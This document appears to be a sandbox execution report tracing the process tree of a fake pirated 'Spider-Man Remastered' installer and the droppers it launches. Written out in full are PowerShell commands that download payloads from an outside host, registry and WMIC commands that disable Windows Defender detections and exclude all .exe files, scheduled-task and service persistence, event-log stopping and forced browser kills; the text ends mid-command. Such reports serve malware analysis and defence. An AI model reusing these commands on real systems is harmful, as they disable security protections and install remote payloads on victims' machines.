C:\Users\Admin\Desktop\Marvels_Spider-Man_Remastered_PC_Full_Español_2022\setup.exe"C:\Users\Admin\Desktop\Marvels_Spider-Man_Remastered_PC_Full_Español_2022\setup.exe"1⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Users\Admin\Documents\SimpleAdobe\uBzB21gRaBCu4H8yUqct1nh5.exeC:\Users\Admin\Documents\SimpleAdobe\uBzB21gRaBCu4H8yUqct1nh5.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1108 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\lKSqTJcm_Cf5uoLE_rJlMm9X.exeC:\Users\Admin\Documents\SimpleAdobe\lKSqTJcm_Cf5uoLE_rJlMm9X.exe2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:1652
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4828
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\Gvj0dmnTTvIZM6cWpErE13Av.exeC:\Users\Admin\Documents\SimpleAdobe\Gvj0dmnTTvIZM6cWpErE13Av.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Users\Admin\AppData\Local\Temp\is-BFMOF.tmp\Gvj0dmnTTvIZM6cWpErE13Av.tmp"C:\Users\Admin\AppData\Local\Temp\is-BFMOF.tmp\Gvj0dmnTTvIZM6cWpErE13Av.tmp" /SL5="$901D8,4995179,54272,C:\Users\Admin\Documents\SimpleAdobe\Gvj0dmnTTvIZM6cWpErE13Av.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Users\Admin\AppData\Local\Voicemod\voicemod32.exe"C:\Users\Admin\AppData\Local\Voicemod\voicemod32.exe" -i4⤵
- Executes dropped EXE
PID:4816
-
-
C:\Users\Admin\AppData\Local\Voicemod\voicemod32.exe"C:\Users\Admin\AppData\Local\Voicemod\voicemod32.exe" -s4⤵
- Executes dropped EXE
PID:4600
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\rWY00BTVMcYAYs88zigHdVER.exeC:\Users\Admin\Documents\SimpleAdobe\rWY00BTVMcYAYs88zigHdVER.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3660
-
-
C:\Users\Admin\Documents\SimpleAdobe\Y_7lx3qbW8Cc5FJCkgxhON9a.exeC:\Users\Admin\Documents\SimpleAdobe\Y_7lx3qbW8Cc5FJCkgxhON9a.exe2⤵
- Executes dropped EXE
PID:3600
-
-
C:\Users\Admin\Documents\SimpleAdobe\AyxJNOQHL9N1vrYlI26EL0vt.exeC:\Users\Admin\Documents\SimpleAdobe\AyxJNOQHL9N1vrYlI26EL0vt.exe2⤵
- Executes dropped EXE
PID:3248
-
-
C:\Users\Admin\Documents\SimpleAdobe\Cbg2h2gIETpIIX8v76vjfnoi.exeC:\Users\Admin\Documents\SimpleAdobe\Cbg2h2gIETpIIX8v76vjfnoi.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3320 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsqB6A5.tmp\est.bat"3⤵PID:4932
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=458&c=1000','i0.exe')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Users\Admin\AppData\Local\Temp\i0.exei0.exe /verysilent /sub=10004⤵
- Executes dropped EXE
PID:4100 -
C:\Users\Admin\AppData\Local\Temp\is-LQ0E0.tmp\i0.tmp"C:\Users\Admin\AppData\Local\Temp\is-LQ0E0.tmp\i0.tmp" /SL5="$1038E,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=10005⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4920 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-1GVO1.tmp\jsmoll > "C:\Users\Admin\AppData\Local\Temp\is-1GVO1.tmp\~execwithresult.txt""6⤵PID:2716
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-1GVO1.tmp\jsmoll7⤵
- Drops file in Program Files directory
PID:4452 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ff9d0c7ab58,0x7ff9d0c7ab68,0x7ff9d0c7ab788⤵PID:1928
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\jsmoll.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-1GVO1.tmp\~execwithresult.txt""6⤵PID:2128
-
C:\Users\Admin\AppData\Local\Temp\is-1GVO1.tmp\openssl.exe"openssl.exe" rsa -in .\jsmoll.pem -pubout -outform DER7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2796
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-1GVO1.tmp\yjovit > "C:\Users\Admin\AppData\Local\Temp\is-1GVO1.tmp\~execwithresult.txt""6⤵PID:5252
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-1GVO1.tmp\yjovit7⤵
- Drops file in Program Files directory
PID:5560 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ff9d0c7ab58,0x7ff9d0c7ab68,0x7ff9d0c7ab788⤵PID:5600
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\yjovit.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-1GVO1.tmp\~execwithresult.txt""6⤵PID:5872
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "msedge.exe"6⤵
- Kills process with taskkill
PID:1880
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "chrome.exe"6⤵
- Kills process with taskkill
PID:5132
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3700
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\akyR2rcV7zbcm3y7o4EZuROd.exeC:\Users\Admin\Documents\SimpleAdobe\akyR2rcV7zbcm3y7o4EZuROd.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Users\Admin\AppData\Local\Temp\7zSB29D.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Users\Admin\AppData\Local\Temp\7zSBDE7.tmp\Install.exe.\Install.exe /hHdidw "525403" /S4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:3052 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:4376
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵PID:1988
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:1840
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:2704
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵PID:1132
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:3060
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:3180
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵PID:3808
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:2484
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:560
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵PID:548
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:4988
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:2300
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵PID:1088
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵PID:2008
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3596 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵PID:264
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:844
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:2400
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5084 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "butYHpXTvMdZIJsEKZ" /SC once /ST 19:19:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSBDE7.tmp\Install.exe\" LY /LEVdidzNsC 525403 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2796
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ"5⤵PID:1776
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn butYHpXTvMdZIJsEKZ6⤵PID:2960
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn butYHpXTvMdZIJsEKZ7⤵PID:2924
-
-
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\BUaQi4cP1zyljDx396pYQARx.exeC:\Users\Admin\Documents\SimpleAdobe\BUaQi4cP1zyljDx396pYQARx.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:5076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3744
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\CqWTZWLU9Ugh8d16tHa8dRGv.exeC:\Users\Admin\Documents\SimpleAdobe\CqWTZWLU9Ugh8d16tHa8dRGv.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:3832
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\P_qunqSD2lV8ZrnT2ae1YWI6.exeC:\Users\Admin\Documents\SimpleAdobe\P_qunqSD2lV8ZrnT2ae1YWI6.exe2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3112
-
-
C:\Users\Admin\Documents\SimpleAdobe\_b66BKpWGl_AANYbhK6JGC5u.exeC:\Users\Admin\Documents\SimpleAdobe\_b66BKpWGl_AANYbhK6JGC5u.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2840
-
-
C:\Users\Admin\Documents\SimpleAdobe\M9t70m9l2GWmJQ9HGwtq1O7B.exeC:\Users\Admin\Documents\SimpleAdobe\M9t70m9l2GWmJQ9HGwtq1O7B.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1388 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3396
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "RULTVSKP"3⤵
- Launches sc.exe
PID:2092 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3060
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"3⤵
- Launches sc.exe
PID:2052
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:2752
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "RULTVSKP"3⤵
- Launches sc.exe
PID:2156
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4396
-
C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exeC:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3616 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:5192
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:5200
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:5208
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:5216
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:5224
-
C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe"C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe"3⤵PID:1456
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵PID:3340
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵PID:1676
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵PID:2868
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵PID:1736
-
-
C:\Windows\system32\svchost.exesvchost.exe4⤵PID:3116
-
-
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:5292
-
-
C:\Users\Admin\AppData\Local\Temp\7zSBDE7.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSBDE7.tmp\Install.exe LY /LEVdidzNsC 525403 /S1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:164 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5552
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5728
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5772
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:5784
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:5804
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:5820
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:5832
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:5856
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:5884
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:5920
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:6012
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:6028
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:6044
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:6092
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:6108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:6128 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:336
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD 